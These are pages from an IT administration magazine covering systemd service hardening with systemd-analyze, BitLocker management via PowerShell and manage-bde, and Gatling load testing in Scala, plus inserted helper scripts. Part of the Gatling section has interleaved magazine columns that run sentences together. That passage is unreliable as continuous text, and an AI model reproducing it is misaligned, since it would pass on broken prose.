After that, the user knows systemd’s opinion on the security status of the services it checked, but what can be done to improve the bad scores? To find out, you can build a minimal service, whose security you then elevate step-by-step. As an example, first create a minimal HTML page in an empty directory (e.g., /home/$USER/Python/sectest/, which will serve later

Figure 1: Tabular rating of services by security aspects.
Lead Image © Didgeman, Pixabay.com

as the document root of a small web server) (Listing 1).
The easiest approach is to borrow the web server itself from Python, which already has a simple model that can be used with virtually no configuration. Next, wrap the server start in a systemd unit file – again, keeping it as simple as possible (Listing 2). Now save the unit file as /lib/systemd/system/helloworld.service and the HTML page as index.html in the document root directory. After typing

systemctl start helloworld.service

enter localhost:8080 in the address bar of a web browser to bring up the plain Hello World page.
In this state, without any precautions, the service is completely unprotected. In the output of systemd-analyze security, it appears with a high score of 9.6 as UNSAFE and a shocked emoji (Figure 3).

Listing 1: Minimal HTML Page
<!doctype html>
<html lang=en>
<head>
<meta charset=utf-8>
<title>Hello World</title>
</head>
<body>
<p><h1>HELLO WORLD!</h1></p>
</body>
</html>

Listing 2: Unit File
[Unit]
Description=Simple HTTP Server
Documentation=https://docs.python.org/3/library/http.server.html

[Service]
Type=simple
WorkingDirectory=/home/jcb/Python/sectest
ExecStart=/usr/bin/python3 -m http.server 8080
ExecStop=/bin/kill -9 $MAINPID

[Install]
WantedBy=multi-user.target

Fundamentals

In the first step, add a line reading

NoNewPrivileges=true

to the Service section of the unit file to prevent the process from escalating its privileges later (e.g., with setuid or setgid bits). After this (as for all subsequent additions to the unit file), you need to reload all unit files and restart the service:

systemctl daemon-reload
systemctl restart helloworld.service

If you now look at the output of systemd-analyze security, the exposure value of helloworld.service has already dropped slightly, from 9.6 to 9.4. Admittedly, this still counts as unsafe.
On with the task: A whole class of attacks can be rendered impossible by adding

PrivateTmp=yes

to the unit file, which causes systemd to create a new, exclusive filesystem namespace for the process and to mount /tmp and /var/tmp/ there. Therefore, the temporary files are no longer shared publicly and are immediately deleted after the process ends. Attacks based on swapping or manipulating temporary files now come to nothing. The exposure value drops to 9.0, but the rating remains unsafe.
The next step is to add

RestrictNamespaces=uts ipc pid user cgroup

to the unit file, which prevents the process from accessing the listed namespaces. The list deliberately excludes the net namespace and a few others that the web server has to use. After this action, the exposure value drops below 9 (to 8.8) for the

Figure 2: A detailed view of all factors considered in the evaluation.

Figure 3: Starting point: The new service is completely insecure.

first time, and the rating is no longer unsafe, only EXPOSED. The emoji’s expression changes from horrified to merely unhappy.

Kernel and Control Groups

The next step is to enable additional protections in the unit file:

ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectControlGroups=yes

The kernel variables, which users can access via /proc/sys/, /sys, /proc/sysrq-trigger/, /proc/latency_stats/, /proc/acpi/, /proc/timer_stats/, /proc/fs/, and /proc/irq/, are now read-only and therefore no longer editable for the process. In any case, the system should only have write access to these variables during booting, so you are not losing any functionality. Because the web server does not need any special kernel modules, you have also stopped it loading and unloading such modules for the web server process. From now on, it cannot access the control groups. Although container administration software might need this access, a web server does not. This step pushes the exposure value down to 8.1.
Finally, you can set:

ProtectSystem=strict
PrivateUsers=strict

The first line mounts /usr and the bootloader directories /boot and /efi in read-only mode for all processes that this unit starts. The second line configures a user group mapping for the process that maps root and the user that starts the unit’s main process to itself – but maps all other users or groups to nobody. The system’s user and group database is thus decoupled from the process running in its own sandbox. The exposure value now drops below 8 (more precisely, to 7.8).

Capabilities

Finally, you can limit the capabilities that will be available to the process. These are rights that can be granted to unprivileged processes in small chunks, which makes it unnecessary to give a process completely unrestricted superuser rights just because it needs a single special right. You can take a fairly restrictive approach here and define

CapabilityBoundingSet=CAP_NET_BIND_SERVICE CAP_DAC_READ_SEARCH

which excludes, for example, the assignment of CAP_SYS_ADMIN, CAP_DAC_OVERRIDE, or CAP_SYS_PTRACE to the process and deducts many points. The exposure value now drops to 5.7 (Figure 4). The rating now confirms a MEDIUM level of security, and for the first time the emoji now looks neutral and no longer unhappy about the situation.

Figure 4: For the first time, the emoji is not dissatisfied: You have achieved a medium level of security.

Conclusions

Quite a few options are yet left to provide additional security. A good compilation of all systemd options suitable for hardening services and that open up a wide field for further optimizations is provided in a description on GitHub [1]. With systemd-analyze as a measuring tool, you can track your progress in each case.

Info
[1] Hardening options for systemd services: [https://gist.github.com/ageis/f5595e59b1cddb1513d1b425a323db04]

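As an added example for the hardening sequence above (not part of the article and not a systemd tool), a Python audit that parses a service unit and reports which of the directives applied step by step are missing or set to a value weaker than the one the article uses; it does not reproduce systemd’s exposure score. The two unit texts are constructed copies of Listing 2 before and after the hardening steps.

```python
"""Audit a service unit for the sandboxing directives the article applies
step by step. Added example; not part of the article and not a systemd tool,
and it does not compute systemd's exposure score. It only reports which of
the article's directives are missing or weaker than the value the article uses."""
from collections import defaultdict

# Directives the article switches on; any value other than no/false/off/0 counts.
BOOLEAN_DIRECTIVES = ("NoNewPrivileges", "PrivateTmp", "ProtectKernelTunables",
                      "ProtectKernelModules", "ProtectControlGroups", "PrivateUsers")
FALSE_VALUES = {"no", "false", "off", "0"}
# Capabilities the article explicitly wants kept out of the bounding set.
RISKY_CAPS = {"CAP_SYS_ADMIN", "CAP_DAC_OVERRIDE", "CAP_SYS_PTRACE"}


def parse_unit(text):
    """Minimal unit-file parser: [sections], repeated keys, '#'/';' comments and
    backslash line continuation. Returns {section: {key: [value, ...]}}."""
    units = defaultdict(lambda: defaultdict(list))
    section, pending = None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):  # value continues on the next line
            pending = line[:-1] + " "
            continue
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        units[section][key.strip()].append(value.strip())
    return units


def audit_caps(values):
    """Findings for CapabilityBoundingSet=. Assignments are applied in order:
    an empty value resets the set, a plain list adds capabilities, and a
    '~'-prefixed list grants everything except the listed ones. Only the
    capabilities in RISKY_CAPS are tracked, which is enough to flag the ones
    the article names."""
    if not values:
        return ["CapabilityBoundingSet= not set"]
    risky = set()
    for value in values:
        if not value:
            risky = set()
        elif value.startswith("~"):
            risky = RISKY_CAPS - set(value[1:].split())
        else:
            risky |= RISKY_CAPS & set(value.split())
    return [f"CapabilityBoundingSet= grants {cap}" for cap in sorted(risky)]


def audit_service(text):
    """Return a list of findings for the [Service] section; an empty list means
    every directive from the article is present with a matching value."""
    service = parse_unit(text).get("Service", {})
    findings = []
    for key in BOOLEAN_DIRECTIVES:
        values = service.get(key)
        if not values:
            findings.append(f"{key}= not set")
        elif values[-1].lower() in FALSE_VALUES:  # last assignment wins
            findings.append(f"{key}= is {values[-1]}")
    if not service.get("RestrictNamespaces", [""])[-1]:
        findings.append("RestrictNamespaces= not set")
    system = service.get("ProtectSystem", [""])[-1].lower()
    if system != "strict":
        findings.append(f"ProtectSystem= is {system or 'unset'}, article uses strict")
    findings.extend(audit_caps(service.get("CapabilityBoundingSet", [])))
    return findings


# Constructed copies of the article's unit before and after hardening
# (working directory and ExecStart as in Listing 2).
BARE_UNIT = """\
[Unit]
Description=Simple HTTP Server

[Service]
Type=simple
WorkingDirectory=/home/jcb/Python/sectest
ExecStart=/usr/bin/python3 -m http.server 8080

[Install]
WantedBy=multi-user.target
"""

HARDENED_UNIT = BARE_UNIT.replace("[Install]", """\
NoNewPrivileges=true
PrivateTmp=yes
RestrictNamespaces=uts ipc pid user cgroup
ProtectKernelTunables=yes
ProtectKernelModules=yes
ProtectControlGroups=yes
ProtectSystem=strict
PrivateUsers=strict
CapabilityBoundingSet=CAP_NET_BIND_SERVICE \\
    CAP_DAC_READ_SEARCH

[Install]""")

if __name__ == "__main__":
    for name, unit in (("bare", BARE_UNIT), ("hardened", HARDENED_UNIT)):
        print(f"{name}: {audit_service(unit) or 'all directives present'}")
```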
TOOLS BitLocker and PowerShell

Managing BitLocker with PowerShell

Babylonian Letters

BitLocker provides current Windows versions a good, closely integrated encryption solution and lets you manage and maintain this feature with PowerShell. By Thomas Bär and Frank-Michael Schlede

Encrypting drives on Windows in user circles is still not as widespread as is prudent from a security perspective. Especially for mobile systems such as notebooks, hard drives should be secured with a transparent encryption solution such as BitLocker so that data is protected, even if a thief removes the hard drive and attempts to access it. System administrators should seriously consider taking advantage of the option to automate the setup and configuration of hard drive encryption.
This is where PowerShell comes into play. Microsoft provides command-line tools and matching cmdlets in the form of manage-bde and repair-bde. Both the PowerShell cmdlets and command-line commands let you handle all the tasks and settings that are supported through the control panel. Although the BitLocker setting is now linked in the new system settings in the pre-release version of Windows 11 and version 21H2 of Windows 10, it still takes you to the settings in the legacy Windows interface from the pre-Windows 10 era.
You are better advised to use the command line and PowerShell. We tested the examples in this article both with version 5.1, which is currently installed on Windows systems by default, and with the open source variant PowerShell 7 on Windows 10 and Windows Server 2019 computers. BitLocker cmdlets and options were not different between systems.

Adding Encryption

BitLocker is not available on the current Windows 10 Home version. The device encryption software is available by default on Windows 10 Professional or Enterprise but usually has to be enabled. Exceptions include, say, Surface devices by Microsoft – the same type of encryption is automatically enabled there.
The server versions of Windows also support the use of drive encryption. However, for the server operating systems, you need to install BitLocker as a feature in Server Manager or the new Windows Admin Center. Additionally, the option to unlock operating system volumes of client systems on domain networks automatically by means of network unlocking on reboot can then be added to the system as a feature.
Of course, you can add BitLocker to a Windows server with PowerShell, but first check to see whether BitLocker is already installed on the system with:

Get-WindowsFeature -Name Bitlocker

If the Install State column of the cmdlet reports that the feature is installed, the software is ready to use. If, on the other hand, it says Available, the administrator has to install BitLocker (Figure 1), which can be done with the associated subfeatures and tools by entering:

Install-WindowsFeature Bitlocker -IncludeAllSubFeature -IncludeManagementTools

After that, the cmdlet reports the Success status as True and explicitly points out that a restart of the operating system is now needed. You can initiate this with Restart-Computer directly in PowerShell.

Lead Image © sergey Mayorov, 123RF.com

Cmdlets

After the reboot, drive encryption is then available, as well as the corresponding PowerShell module with the cmdlets [1] for BitLocker management. Typing

Get-Command -module BitLocker

shows you which special cmdlets are now available to you (Figure 2). If you want to find out about all the drives on your Windows system and their encryption status, call (with administrator privileges) Get-BitLockerVolume. The command lists all drives that are connected to the computer. To display only a specific drive, use the -MountPoint <drive> parameter:

Get-BitlockerVolume -MountPoint "E:"

The Protection Status, VolumeStatus, and AutoUnLock enabled options show important information about the current status of hard disks or partitions. If the drive is encrypted, Protection Status is set to On. VolumeStatus is even more precise and shows whether the disk or partition is already fully encrypted. The AutoUnlock enabled option shows whether you have configured the disk for automatic drive unlocking. On a system that has a lot of drives, listing only those drives with full BitLocker encryption by querying the VolumeStatus property of the corresponding object can be handy:

Get-BitlockerVolume | Where-Object { $_.VolumeStatus -eq 'FullyEncrypted' }

With the help of two cmdlets, Enable-Bitlocker and Disable-Bitlocker, you can then encrypt or decrypt a drive or a partition by specifying the desired drive again.
The command for encryption requires a few more parameters.

Figure 1: On Windows Server (version 2019 is shown here), BitLocker needs to be installed.

Figure 2: Finding the special cmdlets for working with BitLocker.

In addition to the encryption method, which you specify with the -EncryptionMethod parameter, you must define the password you use to lock the drive (Figure 3).
Instead of the -RecoveryKeyPath parameter, you can, among other things, specify the path to a recovery key that is located elsewhere (e.g., on a USB stick). Although we used the -EncryptionMethod AES256 parameter for the encryption method, you can choose between AES256 and AES128 in your script. The -UsedSpaceOnly parameter additionally specifies that you only want to encrypt the space on the volume that is occupied by data. We simply passed the password to the $PassWd variable with the Read-Host cmdlet to demonstrate the use of Enable-Bitlocker:

$PassWd = Read-Host -Prompt "Password, please?" -AsSecureString
Enable-Bitlocker -MountPoint "E:" -EncryptionMethod AES256 -UsedSpaceOnly -Password $PassWd -PasswordProtector

After this call, the drive is encrypted but not yet “locked,” which is accomplished with the help of the final command in Figure 3:

Lock-Bitlocker -MountPoint "E:"

Now, users who want to change to this drive need to enter the password in Explorer or use the Unlock-Bitlocker cmdlet with the password. Again, the assumption is that you stored it in the $PassWd variable:

Unlock-Bitlocker -MountPoint "E:" -Password $PassWd

The Enable-Bitlocker cmdlet in particular offers a large number of other parameters and options. Microsoft provides detailed documentation online [2], including a description of how to use a trusted platform module (TPM), among other things. With the help of the command

get-help Enable-Bitlocker -full

you can display a whole series of examples onscreen that show you how the various parameters come into play.

At the Command Line

Microsoft also offers the manage-bde command-line tool on its operating systems for scripting BitLocker calls. The tool offers a useful choice of options for rolling out and managing drive encryption. To use it, you will need administrator rights (i.e., a command prompt or a PowerShell window with elevated rights). The following call then shows the BitLocker status on the local system:

manage-bde -status

The output is quite detailed and not only shows you the conversion status (Is the entire hard drive encrypted or only the occupied space?) but also the encryption method and the type of key protection device used. You can then immediately see whether the

Figure 3: Encrypting the device.

system is equipped with a TPM and whether it is used on the volume with the operating system. Calling

manage-bde -on <drive>
manage-bde -off <drive>

then lets you switch on or off encryption for the respective drive. For example, if you want to unlock a drive that is protected by BitLocker, run the following command with the appropriate key (always 48 digits) or with the recovery password in the following form:

manage-bde -unlock C: -RecoveryPassword 670499-444444-307582-555555-209561-145200-316107-999999

With the help of the -RecoveryKey <drive> parameter, you can then also load a key that is stored on an external drive:

manage-bde -unlock F: -RecoveryKey T:\

According to the documentation, manage-bde also offers the option to read and configure the TPM module. However, calling

manage-bde -tpm

caused an error message in our lab on both the current Windows 10 (Professional and Enterprise in version 21H1) and Windows Server 2019 (version 1809) versions. The message said manage-bde could not manage the trusted platform module “in this version of Windows” and was followed by the recommendation to edit the Microsoft Management Console Manage TPM snap-in or the corresponding PowerShell cmdlets. We were then able to display the TPM settings on the various devices without any problems by calling the Get-Tpm cmdlet.
As an administrator, TrustedPlatformModule provides a whole series of cmdlets with which you can not only discover the trusted platform module but reset it or examine which features the module supports on the specific device, among other things.
Finally, we would like to mention the repair-bde command-line tool for the sake of completeness. This software is an additional offering from Microsoft that, according to the description, tries to reconstruct critical parts of a severely damaged drive and recover any recoverable data. However, this explicitly only applies if the drive was encrypted by BitLocker and the user has a valid password or recovery key for decryption. The tool has the syntax:

repair-bde <input_volume> <output_volume_or_images>

You should be able to use the key package and recovery password and key to decrypt parts of a BitLocker-protected drive, even if the disk is damaged. However, the command cannot repair a drive if anything failed during the encryption or decryption process.

Conclusions

Encrypting drives significantly reduces the vulnerability of a Windows system, especially on mobile devices. Because BitLocker is an integral part of the professional versions of Windows 10 – and likewise with Windows 11, as well – it is a good choice for encrypting both drives built into computers and external storage media such as USB sticks. Microsoft offers many ways to automate the configuration and monitoring of drive encryption by scripts with a series of PowerShell cmdlets and additional command-line programs.

Info
[1] PowerShell BitLocker management: [https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-use-bitlocker-drive-encryption-tools-to-manage-bitlocker]
[2] Enable-BitLocker cmdlet: [https://docs.microsoft.com/en-us/powershell/module/BitLocker/enable-BitLocker?view=windowsserver2019-ps]

TOOLS Gatling
Gatling load-testing tool

Stressed

Generate load on servers and services with the Gatling load-testing tool. By Christopher Dock

When questioned at work about how the test tool Gatling [1] compared with the somewhat old JMeter, I was at a loss for words. However, it did give me the opportunity to learn more about Gatling and eventually present another possible tool in the arsenal against weak servers and services.
In retrospect, I’m not sure how I missed Gatling, which is no recent upstart. Gatling’s first stable release was in 2012, and only a few years later, its founder created Gatling Corp. to develop and maintain the software. Over the years, Gatling morphed into a product with both open source and Enterprise variants that can hold their own against other test tools.
Yet, Gatling has taken a significantly different path from some of the other load-testing products such as JMeter and LoadRunner. With Gatling, you don’t have a custom IDE for development. Instead, you use the Gatling framework in your favorite editor to write your own test script in Scala.

Getting Started

All Gatling tests start pretty much the same, by subclassing from the Scala Simulation class. The simulation is essentially a collection of individual

Listing 1: Simple Gatling Example

package com.mypackagename

import scala.concurrent.duration._
import io.gatling.core.Predef._
import io.gatling.http.Predef._

class BlazeDemoV1 extends Simulation {

  var qualifiedhost = "http://blazedemo.com"
  var proxyport = 0
  var proxyhost = "not set"

  // headers for HTTP call
  val headers = Map(
    "Accept" -> "text/html",
    "User-Agent" -> "LinuxMagazine/1.0.1",
    "Accept-Encoding" -> "gzip, deflate",
    "Connection" -> "keep-alive",
    "DNT" -> "1" )

  // http connector
  var httpProtocol = http
    .baseUrl(qualifiedhost)

  // route through a proxy only if one was configured
  if (proxyport > 0)
    httpProtocol = httpProtocol.proxy(Proxy(proxyhost, proxyport))

  val scn = scenario("BookFlight")
    .exec(http("step_1")
      .get("/")
      .headers(headers)
      .check(status.is(200)))
    .exec(http("step_2")
      .get("https://google.com/")
      .headers(headers)
      .check(status.is(200)))
    .pause(5)

  setUp(
    scn.inject(atOnceUsers(1))
  ).protocols(httpProtocol)
}

Photo by NoWah Bartscher on Unsplash

34 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
Gatling TO O L S

requests that a user or program would process is reminiscent of Java. One of Listing 2: Parallel Load Tests
normally make. Because your test is a the neat technology choices that was 01 setUp(
program, you are given the flexibility made is that the Scala code is com- 02 scn1.inject(
of creating variables, constants, and piled by the Java compiler and then 03 constantConcurrentUsers(2).during(60.seconds),
methods, and because you are using uses the Java Virtual Machine (JVM) 04 rampConcurrentUsers(2).to(4).during(10.seconds)
a proper programming language, you installed on your computer. 05 ).protocols(httpProtocol),
can create your own library of sup- This one feature alone allows you to 06 scn2.inject(
port objects or methods. use any of the existing standard Java 07 constantUsersPerSec(2).during(15.seconds),
Your performance tests can include libraries or even your own custom 08 rampUsersPerSec(2).to(4).during(10.seconds)
09 ).protocols(httpProtocol)
one or more classes, but you can cre- code. Yet Java code is subtly differ-
10 )
ate and include a lot of regular Scala ent in syntax, so even using standard
objects, as well. Scala also supports Java.io calls to read files will look
an object type that appears to be fairly foreign once completed. The framework does have the http
similar to a class, but it is more akin Line 7 defines the class file, which inher- object, which encapsulates all of the
to a singleton than a normal Java or its from the Scala base class Simulation, logic for connections between ma-
C++ class. and lines 9-11 define a few variables. In chines over the Internet. Instantiating
You don’t have to be a Scala program- a proper production-quality script, these a variable with quite a number of dif-
mer to enjoy the freedom that Gatling variables would probably be replaced ferent parameters is possible with this
provides. Most developers, despite with values that are passed in or per- class. The most important parameter
having a favorite language or toolset, haps read from a configuration file. The is the URL of the machine to which
can easily learn enough Scala to cre- proxy configuration is not being used to connect. Just like with other lan-
ate their own test scripts in a few in this example, so simply setting these guages, additional method calls can
hours. Because the test script is pure variables for your proxy will allow you perform additional variable setup.
source code, you receive extra advan- to run the script over the proxy without Lines 21-26 demonstrate how to cre-
tages that are commonly enjoyed with any further modifications. ate the HTTP protocol variable and
normal software development: the Lines 13-19 define the key pairs to be how to override it in favor of a proxy
use of common developer tools such used as header values for HTTP state- server, if one is needed.
as git, diff, and grep. ments. This collection has been de- Lines 28-37 show the creation of a
The first five lines of Listing 1 assign fined as a constant with the keyword scenario that is just a list of all the
the class to a package and include all val, whereas the variables in the pre- different statements that will be
of the necessary reference informa- vious lines are re-assignable because called. The scenario test will be run
tion for the program. Of course, this they use the keyword var. again and again. In this example, one

Figure 1: Gatling proxy server recorder setup.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 35
TO O L S Gatling

Listing 3: Proxy Recorder Excerpt scripts or who want to lighten their


load, by providing a proxy server
01 val scn = scenario("acmewebsite") that will record the steps that pass
02 .exec(http("request_0")
through it (Figure 1).
03 .get("/")
To capture a URL and what you do
04 .headers(headers_0)
05 .resources(http("request_1")
while at that URL, simply start up
06 .get(uri2 + "/resources/sites/phoenix/style/font/teleneo-variable.woff2") and point your web browser to the
07 .headers(headers_1), proxy server. The information is then
08 http("request_2") processed into a Scala source file and
09 .get(uri2 + "/binaries/assets/fonts/TeleGroteskScreen-Regular.woff") saved with a class name you provide.
10 .headers(headers_2), This output is saved into the default
11 http("request_3") location for Scala simulations.
12 .get(uri2 + "/binaries/assets/fonts/phx-core-icons.woff") To use this recorder, just press the
13 .headers(headers_2), Start button, which opens another
window (Figure 2) that lets you fol-
of the calls uses the default URL that test to verify that everything is run- low along as you select pages in your
has been set up in the HTTP protocol. ning correctly. web browser.
The second call uses a different URL Gatling provides quite a number of A side effect for scripts that have
that has no connection to the URL ways to create different load sce- been created by the recorder can be
that was used during object creation. narios. Listing 2 shows a more com- seen in Listing 3. That is, the code
Both of these statements use pre- plex setup that includes two different is pretty difficult to read because
defined header values but could just scenarios running in parallel. Each of most modern web pages have a lot
as easily be different sets for different these scenarios use different methods of resources, Java scripts, or other
calls. Each of these statements check for generating user load. frameworks. Everything that is
that the call receives return code 200, downloaded by the website will also
indicating a successful call. Point-and-Click Testing be downloaded in tests created with
The final and most important part the proxy recorder. These resources
of this script is lines 39-41. All lines Not everyone is a natural-born soft- are necessary for a web page but
up to this point define and prepare a ware developer. However, quite a few might not be required for perfor-
test scenario, but in these three final people who might not be able to cre- mance testing.
lines, the user scenario is executed ate a program from scratch can make The proxy recorder is a convenient
by the framework. In this particular small modifications to or extend exist- way to create a sample script that
code, the test is only run once with ing programs. can be used as a source when writing
a single user. Although not a very re- Gatling provides a crutch for people your own test scripts. This recorder
alistic load test, it is a perfect smoke who either cannot write their own can be run for all of the steps in your
test. Then, you have all the headers
as well as the URLs you will need in
code form. However, all but the most
simple tests should probably be refac-
tored into a few Scala objects and
classes to make the code understand-
able and the test script maintainable.

Extending Scala and Java


Perhaps the major advantage of
Gatling tests is that they are written
as small programs that can be orga-
nized into smaller, easy-to-understand
units, which also makes the code
calling it much easier to understand.
The most reasonable decomposition
would be to extract the testing steps
from Listing 1 and put them into their
own object, similar to Listing 4.
The new DemoSteps object contains
Figure 2: Proxy recorder window. the headers and two steps, each

36 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
Listing 4: Test Code in Separate Object

package com.mypackagename

import io.gatling.core.Predef._
import io.gatling.http.Predef._

object DemoSteps {

  // headers for HTTP call
  var headers = Map(
    "Accept" -> "text/html",
    "User-Agent" -> "LinuxMagazine/1.0.1",
    "Accept-Encoding" -> "gzip, deflate",
    "Connection" -> "keep-alive",
    "DNT" -> "1")

  var getSitePage =
    exec(http("step_1_getpage")
      .get("/")
      .headers(headers)
      .check(status.is(200)))

  var getGooglePage =
    exec(http("step_1_getgoogle")
      .get("https://google.com")
      .headers(headers)
      .check(status.is(200)))
}

having a meaningful name. This code is easy to understand and maintain and makes the scenario definition four very readable lines:

val scn = scenario("BookFlight")
  .exec(
    DemoSteps.getSitePage,
    DemoSteps.getGooglePage);

If this test had many steps and a more meaningful object name, it would be possible for anyone to have a complete understanding of what the test does and how it is organized.

You can create simple methods within a Scala object that use plain old Java code and library calls:

import java.util.Calendar

def getnow() : String = {
  var calendar = Calendar.getInstance()
  var now = calendar.getTime() + "";
  now
}

In this way, you can leverage all of your expertise and custom libraries in your tests.

Running Tests

Gatling is a command-line program, which makes it easy to script tests. The gatlingdemo.sh script [2] can be run directly without parameters, in which case it will use all of the default directories and provide a list of all available Gatling tests in the simulations directory.

A convenient way of organizing tests is to have the source code and test results in separate directories, which can be accomplished by having all of the Gatling directories in a separate directory by test (Table 1). The example in Listing 5 is a simple script that runs a test and uses those local directories.

Table 1: Gatling Command-Line Args

Command                 Function
-sf <simulation dir>    Path for Gatling class and object sources
-rf <results dir>       Location of test reports
-bf <temp dir>          Temp directory of compiled objects
-rsf <resource dir>     Location of input files
-s <classname>          Name of Scala class to run
-rd <description>       Descriptive text added to a report

Listing 5: Running a Local Test

#!/bin/bash
CLASS=$1
SRC=`pwd`/simulations
RESOURCE=`pwd`/resources
RESULT=`pwd`/results
TMP=`pwd`/temp
DESC="desc goes here"

# the description contains spaces, so pass the variable quoted
gatling.sh -sf $SRC -rsf $RESOURCE -rf $RESULT -bf $TMP \
  -s $CLASS -rd "$DESC"

All of the output goes to stdout. A small status block (Listing 6) lets you keep an eye on the status of the script that is running Gatling, with the successes and failures for each step output every five seconds. Normally you would not watch this output, but it is a convenient way to verify that everything is working as the script gets started. Once Gatling is finished running, it will output a final block with some statistics, as well as the directory where the output report has been generated.

Listing 6: Test Status

================================================================================
2021-06-20 22:49:24                                          17s elapsed
---- Requests ------------------------------------------------------------------
> Global (OK=24 KO=0 )
> step_1_getpage (OK=3 KO=0 )
> step_1_getpage Redirect 1 (OK=3 KO=0 )
> step_2_reserve (OK=3 KO=0 )
> step_2_reserve Redirect 1 (OK=3 KO=0 )
> step_3_purchase (OK=3 KO=0 )
> step_3_purchase Redirect 1 (OK=3 KO=0 )
> step_4_confirm (OK=3 KO=0 )
> step_4_confirm Redirect 1 (OK=3 KO=0 )

---- BookFlight ----------------------------------------------------------------
active: 0 / done: 3
===============================================================================

Gatling Output

Reports are generated as HTML (Figures 3 and 4), and all reports can be made available over your intranet, where users can view them with their web browser. Because the reports are powered with a bit of JavaScript, you can zoom in and inspect the steps and define the starting and ending times.
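As an added example (not the article's or Gatling's own code), the following POSIX shell functions parse a status block in the format of Listing 6 and turn it into a pass/fail signal, so a CI job that wraps gatling.sh can stop when any step reports KO > 0. The status text embedded in it is a constructed sample with deliberate failures.

```shell
#!/bin/sh
# Added example, not the article's or Gatling's own code: parse the status
# block Gatling prints (format as in Listing 6) and fail when any step has
# KO > 0, so a CI job that wraps gatling.sh can gate on the result.

# Constructed sample in the Listing 6 format; step_2_reserve has two failed
# requests so that the checks below have something to report.
SAMPLE_STATUS='================================================================================
2021-06-20 22:49:24                                          17s elapsed
---- Requests ------------------------------------------------------------------
> Global                                                   (OK=22     KO=2     )
> step_1_getpage                                           (OK=3      KO=0     )
> step_1_getpage Redirect 1                                (OK=3      KO=0     )
> step_2_reserve                                           (OK=1      KO=2     )
> step_3_purchase                                          (OK=3      KO=0     )
---- BookFlight ----------------------------------------------------------------
          active: 0      / done: 3
================================================================================'

# Print "<name> <ok> <ko>" for every "> name (OK=n KO=m)" request line,
# skipping the Global total. Spaces inside a name ("step_1_getpage
# Redirect 1") become underscores so each field stays a single word.
gatling_step_counts() {
    printf '%s\n' "$1" | awk '
        /^> / {
            name = $0
            sub(/^> +/, "", name); sub(/ +\(OK=.*$/, "", name)
            if (name == "Global") next
            gsub(/ /, "_", name)
            ok = $0; sub(/^.*\(OK=/, "", ok); sub(/ .*$/, "", ok)
            ko = $0; sub(/^.*KO=/, "", ko);   sub(/[ )].*$/, "", ko)
            print name, ok, ko
        }'
}

# Names of steps with at least one failed request, one per line.
gatling_failed_steps() {
    gatling_step_counts "$1" | awk '$3 > 0 { print $1 }'
}

# Total number of failed requests over all listed steps.
gatling_total_ko() {
    gatling_step_counts "$1" | awk '{ s += $3 } END { print s + 0 }'
}

# Exit status 0 when no step reports a failure, 1 otherwise; the failing
# steps are listed on stderr so a CI log shows what to look at.
gatling_assert_no_failures() {
    failed=$(gatling_failed_steps "$1")
    if [ -n "$failed" ]; then
        echo "gatling: steps with KO > 0:" >&2
        printf '  %s\n' $failed >&2
        return 1
    fi
    return 0
}
```

Feed the block captured from gatling.sh (for example the tail of its stdout) to gatling_assert_no_failures and let the job's exit status follow it.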
Full Test

A BlazeMeter [3] sample website simulates a travel site that can be used for testing JMeter. HTTP calls made to this site step through the simulated process of booking a ticket. Because Gatling can also make HTTP calls, you can also use this same website to test your skills. Booking a ticket on the site takes four simple steps:

- Choose departure and destination cities
- Pick an airline
- Enter payment details
- View the confirmation

The calls for this test have been stored in their own Scala FlightSteps object for better clarity. The Scala code for this object is quite similar to those seen in Listings 1 and 3. All of the code for this test is available online [2], but perhaps the most interesting part of the test is the main script (Listing 7).

Most of the first 26 lines of the test script are similar to the first Gatling example. It includes all the required Gatling include files (i.e., import io.gatling.core.Predef._), as well as two custom objects. Lines 13-14 retrieve values from Bash environment variables. When these variables are defined, the values will be used to set up the proxy. Lines 28-35 define the test scenario that performs the four steps of purchasing a ticket. The most important lines are 37-42. In this example, no real load is generated against the server, but it would be just as easy to change the code to run the scenario 50 or 100 times in parallel.

Figure 3: Results in tabular form.

Figure 4: Graphs of response times.

Although Gatling is a nice tool, you should compare it against alternative performance testing tools, such as the proprietary LoadRunner or the open source JMeter [4]. This exact same test with the BlazeMeter test site is also available in a previous article [5] for a direct comparison with JMeter.

Listing 7: Gatling Script for BlazeMeter

01 package com.mypackagename
02
03 import scala.concurrent.duration._
04 import io.gatling.core.Predef._
05 import io.gatling.http.Predef._
06
07 import com.mypackagename.mySupport._
08 import com.mypackagename.FlightSteps
09
10 class BlazeBookFlight extends Simulation {
11
12   var qualifiedhost = "http://blazedemo.com"
13   var proxyhost = fetchEnvString("proxyhost","not set")
14   var proxyport = fetchEnvInt("proxyport",0)
15   var debug = 0
16
17   // http connector
18   var httpProtocol = http
19     .baseUrl(qualifiedhost)
20
21   if (proxyport > 0)
22   {
23     httpProtocol = httpProtocol.proxy(Proxy(proxyhost,proxyport))
24     println(s"proxyhost $proxyhost");
25     println(s"proxyport $proxyport");
26   }
27
28   val scn = scenario("BookFlight")
29     .exec(
30       FlightSteps.getSitePage,
31       FlightSteps.reserveFlight,
32       FlightSteps.purchaseFlight,
33       FlightSteps.confirmFlight
34     )
35     .pause(5)
36
37   setUp(
38     scn.inject(
39       constantConcurrentUsers(1).during(6.seconds),
40       rampConcurrentUsers(1).to(2).during(4.seconds)
41     ).protocols(httpProtocol)
42   )
43 }

Info
[1] Gatling: [https://gatling.io/]
[2] Code for this article: [ftp://ftp.linux-magazine.com/pub/listings/admin-magazine.com/67/]
[3] BlazeMeter test site: [https://blazedemo.com]
[4] Apache JMeter: [https://jmeter.apache.org/]
[5] "JMeter Performance Testing" by Christopher Dock, ADMIN, issue 66, 2021, pg. 72

Author
Christopher Dock is a senior consultant at T-Systems onsite services. When he is not working on integration projects, he likes to experiment with small embedded solutions such as the Raspberry Pi or Arduino. To this end, he has authored a book to help people get started in the area of DIY electronics, Getting Started with Arduino and Raspberry Pi, ISBN 978-1952930027.
TOOLS ThinLinc

Remote access with ThinLinc 4.12

Timeless Classic

